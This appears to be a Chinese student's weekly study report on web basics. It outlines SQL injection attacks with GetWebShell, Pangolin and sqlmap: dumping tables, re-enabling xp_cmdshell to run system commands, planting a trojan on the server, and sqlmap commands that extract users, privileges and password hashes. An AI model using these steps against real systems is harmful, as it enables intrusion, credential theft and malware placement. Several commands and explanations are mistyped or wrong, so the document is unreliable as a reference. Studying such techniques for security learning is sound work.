大一第二学期周报7Web基础

工具

一·GetWebSell增强版 TOOLs.Net
注入地址：（注入点）
备份路径：（网站根目录）

二·穿山甲
URL：（注入点）

跑完注入点后

按Select all→Go

获取注入点信息

我们可以
获取数据→获取表→获取列→读数据

再按
命令 恢复xp_cmdshell 执行

命令：
net user whoami

然后按
写文件，如下图所示

下面的选项中有一个文件管理，其作用是列磁盘和列目录

下载
把我们的木马下到它的某一个路径下，下好后去命令运行。

三·sql map
cmd中
sqlmap.py -u "注入点"

跑出来后，
cmd中
sqlmap.py -u “注入点” --is-dba
看权限

True的话是sa权限，见下图黄圈左边

sqlmap.py -u “注入点” --current-user
看当前用户名称

sqlmap.py -u “注入点” --privileges
看权限

sqlmap.py -u “注入点” --password
报密码

sqlmap.py -u “注入点” --current-db
看看当前是哪个数据库

如果是test数据库

sqlmap.py -u “注入点” --tables -D test(数据库名) --couent
看test数据库每个表里有多少列

sqlmap.py -u “注入点” --columns -T admin -D test
看test数据库的admin表里有多少数据